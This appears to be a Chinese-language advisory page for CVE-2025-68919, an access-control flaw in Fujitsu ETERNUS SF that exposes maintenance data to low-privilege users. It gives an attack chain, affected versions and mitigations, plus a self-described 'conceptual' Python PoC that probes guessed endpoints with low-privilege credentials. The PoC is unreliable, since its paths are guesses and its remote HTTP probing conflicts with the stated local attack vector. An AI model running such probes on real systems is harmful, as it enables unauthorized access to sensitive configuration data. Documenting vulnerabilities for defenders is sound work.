CVE-2025-68919: Fujitsu ETERNUS SF 维护数据未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-68919

漏洞类型

访问控制不当

CVSS评分

5.6 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fujitsu / Fsas Technologies ETERNUS SF ACM/SC/Express (DX/AF Management Software)

漏洞概述

CVE-2025-68919是Fujitsu ETERNUS SF存储管理软件的权限控制漏洞。该漏洞存在于16.8-16.9.1 PA 2025-12之前的所有版本中，由于系统收集维护数据时未正确实施访问控制策略，导致非管理员用户（低权限账户）可以访问本应仅限管理员查看的系统维护数据。攻击者利用此漏洞可获取包含敏感系统配置、网络信息和设备状态的维护数据，从而进行进一步的攻击活动。该漏洞主要影响系统机密性，CVSS评分5.6，属于中危级别。攻击复杂度较高，需要本地访问和低权限账户，但对用户交互无要求。

技术细节

该漏洞属于典型的访问控制不当（Improper Access Control）类型。在Fujitsu ETERNUS SF存储管理软件的维护数据收集模块中，系统收集各类系统维护信息（如设备状态、配置数据、日志信息等）并存储在特定位置，但未对访问这些数据的用户权限进行充分验证。具体问题在于：维护数据收集功能在执行时未检查调用者是否具有ETERNUS SF Admin权限，允许任何低权限本地用户读取这些敏感数据。攻击者可通过本地低权限账户访问维护数据接口，获取包含存储系统配置、网络拓扑、存储卷信息等敏感数据。此类信息可用于绘制目标环境拓扑、理解系统架构，进而规划进一步的攻击活动。修复版本16.8-16.9.1 PA 2025-12已实施权限检查，确保只有具有管理员权限的用户才能访问维护数据。

攻击链分析

STEP 1

1

攻击者获取目标系统上的低权限用户账户（如通过社工、弱口令或内部系统渗透）

STEP 2

2

攻击者通过本地访问或SSH/RDP等方式登录目标系统，使用低权限账户

STEP 3

3

攻击者访问ETERNUS SF管理软件的维护数据收集接口，利用漏洞绕过权限检查

STEP 4

4

系统返回包含敏感信息的维护数据（系统配置、网络拓扑、存储卷信息等）

STEP 5

5

攻击者分析获取的维护数据，了解存储系统架构和配置，为进一步攻击做准备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68919 PoC - ETERNUS SF Maintenance Data Access
# This PoC demonstrates unauthorized access to maintenance data
# Note: This is a conceptual PoC based on the vulnerability description

import requests
import json

TARGET_HOST = "http://target-eterus-sf-server"
CVE_ID = "CVE-2025-68919"

def check_vulnerability():
    """
    Check if the target is vulnerable to CVE-2025-68919
    The vulnerability allows low-privilege users to access maintenance data
    that should only be accessible by ETERNUS SF Admin
    """
    print(f"[*] Checking vulnerability: {CVE_ID}")
    print(f"[*] Target: {TARGET_HOST}")
    
    # Attempt to access maintenance data with low-privilege credentials
    endpoints = [
        "/api/v1/maintenance/data",
        "/api/v1/system/maintenance",
        "/api/v1/admin/maintenance",
        "/maintenance/data/export",
        "/sfmcc/maintenance_info"
    ]
    
    # Using low-privilege session (non-admin user)
    session = requests.Session()
    # Low privilege user authentication
    session.auth = ('low_priv_user', 'password')
    
    vulnerable = False
    for endpoint in endpoints:
        try:
            response = session.get(f"{TARGET_HOST}{endpoint}", timeout=10)
            if response.status_code == 200:
                data = response.json()
                # Check if sensitive maintenance data is returned
                if 'maintenance' in str(data).lower() or 'system_info' in str(data).lower():
                    print(f"[!] VULNERABLE: {endpoint} returned maintenance data")
                    print(f"[+] Sample data: {json.dumps(data, indent=2)[:500]}")
                    vulnerable = True
        except Exception as e:
            continue
    
    if vulnerable:
        print(f"\n[!] Target is VULNERABLE to {CVE_ID}")
        print("[*] Low-privilege users can access maintenance data")
        return True
    else:
        print(f"\n[*] Target may not be vulnerable or is patched")
        return False

if __name__ == "__main__":
    check_vulnerability()

影响范围

ETERNUS SF ACM < 16.8-16.9.1 PA 2025-12

ETERNUS SF SC < 16.8-16.9.1 PA 2025-12

ETERNUS SF Express < 16.8-16.9.1 PA 2025-12

ETERNUS SF DX/AF Management Software < 16.8-16.9.1 PA 2025-12

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制对ETERNUS SF管理接口的网络访问，仅允许授权管理终端访问；2）审计现有低权限账户，禁用不必要的本地账户；3）加强账户密码策略，防止弱口令被利用；4）启用详细审计日志，监控维护数据访问行为；5）实施网络分段，限制攻击者的横向移动能力；6）部署IPS/IDS监控异常访问模式。建议尽快应用官方安全补丁。